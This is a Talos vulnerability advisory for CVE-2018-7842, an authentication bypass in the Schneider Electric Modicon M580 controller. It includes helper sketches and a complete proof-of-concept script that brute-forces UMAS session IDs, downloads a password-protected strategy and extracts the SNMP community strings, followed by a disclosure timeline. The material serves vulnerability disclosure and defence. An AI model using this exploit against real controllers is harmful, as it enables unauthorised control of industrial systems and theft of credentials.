Talos Vulnerability Report

TALOS-2018-0741

Schneider Electric Modicon M580 UMAS Improper Authentication Vulnerability

June 10, 2019

CVE Number

CVE-2018-7842

Summary

An exploitable improper authentication vulnerability exists in the UMAS PLC reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can allow an attacker to masquerade as an authenticated user, resulting in the ability to bypass password protections in place on the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs

https://www.schneider-electric.com/en/work/campaign/m580-epac/

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-290: Authentication Bypass by Spoofing

Details

The Modicon M580 is the latest in Schneider Electric’s Modicon line of programmable automation controllers. The device holds a Wurldtech Achilles Level 2 certification and provides global policy controls for quickly enforcing various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as “UMAS.”

During normal operation, the Modicon M580 uses a pair of UMAS requests, TAKE_PLC_RESERVATION and RELEASE_PLC_RESERVATION, to determine which users are allowed to execute privileged commands. When one user has successfully obtained a reservation, no other user is able to execute commands that fall into certain categories, such as UPLOAD_BLOCK.

If a legitimate user writes a new strategy containing a password to the device, that password will be required to make any additional modifications to the device or to run any privileged commands. The correct password must be specified in a TAKE_PLC_RESERVATION request, which on success returns a session ID that carries the authorization needed to run privileged commands. Any attempt to run a privileged command without first obtaining an elevated session in this way will fail.

Once a legitimate user has established an elevated session, most commonly through UnityPro, an attacker can brute-force the session ID and send privileged commands in the context of that user. Session IDs are one byte in size, so there are only 256 possible values. By wrapping each possible value in a command that requires a session, such as INITIALIZE_UPLOAD, and analyzing the response code, it is possible to identify a valid elevated session. A response code of 0xFE during this loop indicates that a valid session has been found.
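The enumeration described above can be sketched in Python 3 as follows. This is a minimal illustration, not the proof of concept itself: `find_elevated_session`, `probe`, and `fake_probe` are hypothetical names, and `probe` is assumed to send one session-bound request (for example INITIALIZE_UPLOAD) and return the raw Modbus/TCP response. The response-code offset of 9 assumes a 7-byte MBAP header followed by the function code and session byte, which matches the index checked in the proof of concept. The 0xFD value in the stand-in is an arbitrary placeholder for any non-success code.

```python
from typing import Callable, Optional

RESPONSE_CODE_OFFSET = 9   # 7-byte MBAP header + function code + session byte
VALID_SESSION_CODE = 0xFE  # response code the report associates with a valid session


def find_elevated_session(probe: Callable[[int], bytes]) -> Optional[int]:
    """Return the first session ID whose response carries 0xFE, else None."""
    for session_id in range(256):  # one byte, so every value 0x00..0xFF
        response = probe(session_id)
        if (len(response) > RESPONSE_CODE_OFFSET
                and response[RESPONSE_CODE_OFFSET] == VALID_SESSION_CODE):
            return session_id
    return None


def fake_probe(session_id: int) -> bytes:
    """Stand-in for a device: only session 0xA7 is treated as elevated."""
    code = 0xFE if session_id == 0xA7 else 0xFD  # 0xFD is a placeholder error code
    return bytes(7) + bytes([0x5A, session_id, code])
```

Returning `None` rather than a falsy value keeps a hit on session ID 0 distinguishable from "nothing found".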

The structure of an INITIALIZE_UPLOAD command takes a form similar to this:

    0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f
  +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
0 | A | B | C |   D   |
  +---+---+---+---+---+

A --> Modbus Function Code (0x5A)
B --> Session
C --> UMAS Function Code   (0x30)
D --> Unknown              (0x0001)
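As a rough illustration of the layout above, the following Python 3 sketch assembles the five-byte request and prefixes it with a standard Modbus/TCP MBAP header. The function name `build_initialize_upload` and the default `trans_id` and `unit_id` values are assumptions made for this example. Field D is written as the bytes 0x00 0x01, in the same order the proof of concept sends them.

```python
import struct

MODBUS_FNC_UMAS = 0x5A         # field A: Modbus function code
UMAS_INITIALIZE_UPLOAD = 0x30  # field C: UMAS function code
UNKNOWN_FIELD = b"\x00\x01"    # field D: purpose unknown


def build_initialize_upload(session_id: int, trans_id: int = 1,
                            unit_id: int = 0xFF) -> bytes:
    """Build a Modbus/TCP frame carrying INITIALIZE_UPLOAD for one session ID."""
    # Fields A, B and C are one byte each; field D follows as two raw bytes.
    pdu = struct.pack("BBB", MODBUS_FNC_UMAS, session_id,
                      UMAS_INITIALIZE_UPLOAD) + UNKNOWN_FIELD
    # MBAP header: transaction ID, protocol ID (0 for Modbus), length, unit ID.
    # The length field counts the unit ID byte plus the PDU.
    mbap = struct.pack(">HHHB", trans_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu
```

With this layout the session byte sits at offset 8 of the full frame, directly after the function code.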

With this valid session, any privileged command can be executed successfully, even if the device password is not known. An easy way to test this is to attempt to download the strategy of a password-protected device with a non-elevated session and compare the result to a strategy downloaded from a spoofed elevated session. In the former case the device will return errors and fail to provide any data, whereas in the latter it will return the strategy.

Exploit Proof of Concept

import struct
import socket
from scapy.all import Raw
from scapy.contrib.modbus import ModbusADURequest
from scapy.contrib.modbus import ModbusADUResponse
import random
 
 
def send_message(sock, umas, data=None, wait_for_response=True):
    transId = random.randint(1,0xff)
    if data is None:
        packet = ModbusADURequest(transId=transId)/umas
    else:
        packet = ModbusADURequest(transId=transId)/umas/data
    msg = "%s" % Raw(packet)
    resp = ""
    sock.send(msg)
    if wait_for_response:
        resp = sock.recv(2048)
    return resp
 
def main():
    rhost = "192.168.10.1"
    rport = 502
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((rhost, rport))
 
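    # use None (not False) so a valid session ID of 0 is not mistaken for failure
    session = None
    # session IDs are one byte, so try all 256 values (0x00 through 0xff)
    for i in xrange(256):
        # INITIALIZE_UPLOAD
        mbtcp_fnc = "\x5a"
        umas_fnc = "\x30"
        cur_session = struct.pack("B", i)
        unknown = "\x00\x01"
        umas = "%s%s%s%s" % (mbtcp_fnc, cur_session, umas_fnc, unknown)
        res = send_message(sock=s, umas=umas)
 
        # byte 9 of the response holds the response code; 0xfe marks a valid session
        if len(res) > 9 and res[9] == "\xfe":
            session = i
            break
    if session is not None: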
        print "Success"
        print "Session Token: %s" % (hex(session))
 
        session = struct.pack("B", session)
 
        # INITIALIZE_DOWNLOAD
        mbtcp_fnc = "\x5a"
        umas_fnc = "\x33"
        unknown = "\x00\x01"
        block_len = "\xfb\x03"
        umas = "%s%s%s%s%s" % (mbtcp_fnc, session, umas_fnc, unknown, block_len)
        send_message(sock=s, umas=umas)
 
        # DOWNLOAD_BLOCK
        mbtcp_fnc = "\x5a"
        umas_fnc  = "\x34"
        unknown1  = "\x00\x01"
        strategy = ""
        for i in xrange(0x49):
            block_num = struct.pack("<H", i)
            umas = "%s%s%s%s%s" % (mbtcp_fnc, session, umas_fnc, unknown1, block_num)
            res = send_message(s, umas)
            if struct.unpack("<H", res[12:14])[0] == 0:
                break
            strategy = "%s%s" % (strategy, res[14:])
         
        # parse the downloaded strategy
        # start by searching for a static heading and cropping down the data
        bfpx_index = strategy.index("BFPX")
        services_section_data = strategy[bfpx_index:]
        bfpx_data_size = 0x38
 
        # parse the zip file section header table
        services_data = services_section_data[bfpx_data_size:]
        services_data_len = len(services_data)
        data_offset = 0
        snmp_size = 0
        snmp_offset = 0
        header_size = 0x1c
        headers = 0
        for i in xrange(0, services_data_len, header_size):
            section_name = services_section_data[i+0x01:i+0x10]
            if section_name[:3] == "ST_":
                headers += 1
                if "ST_SNMP" in section_name:
                    snmp_size = struct.unpack("<H", services_section_data[i+0x19:i+0x1b])[0]
                    snmp_offset = data_offset
                data_offset += struct.unpack("<H", services_section_data[i+0x19:i+0x1b])[0]
        snmp_offset += headers * header_size
 
        # parse the snmp section data
        snmp_data = services_data[snmp_offset:snmp_offset+snmp_size]
        comm_string_size = 16
        write_offset = 0
        read_offset = write_offset + comm_string_size
        trap_offset = read_offset + comm_string_size
 
        write = snmp_data[write_offset:read_offset]
        read = snmp_data[read_offset:trap_offset]
        trap = snmp_data[trap_offset:trap_offset+comm_string_size]
         
        print "Write:\t%s" % (write)
        print "Read:\t%s" % (read)
        print "Trap:\t%s" % (trap)
 
    else:
        print "No session discovered"
 
 
if __name__ == '__main__':
    main()
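
The final step of the proof of concept, splitting the SNMP section into its community strings, can be sketched on its own in Python 3. The layout of three consecutive 16-byte fields in the order write, read, trap is taken from the proof of concept. The function name `split_community_strings` is hypothetical, and trimming trailing NUL bytes is an assumption about how unused space in each field is padded.

```python
COMM_STRING_SIZE = 16  # field width used by the proof of concept


def split_community_strings(snmp_data: bytes) -> dict:
    """Split an SNMP section into its write, read and trap community strings."""
    fields = {}
    for index, name in enumerate(("write", "read", "trap")):
        start = index * COMM_STRING_SIZE
        raw = snmp_data[start:start + COMM_STRING_SIZE]
        # Assumption: unused bytes are NUL padding, so trim them for display.
        fields[name] = raw.rstrip(b"\x00").decode("ascii", errors="replace")
    return fields
```

For example, a section holding `private`, `public`, and `trap`, each padded to 16 bytes, yields a dictionary with those three values under the `write`, `read`, and `trap` keys.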

Timeline

2018-12-10 - Initial contact
2018-12-17 - Vendor acknowledged
2019-01-01 - 30-day follow-up
2019-05-14 - Vendor patched
2019-06-10 - Public Release

Credit

Discovered by Jared Rittle of Cisco Talos.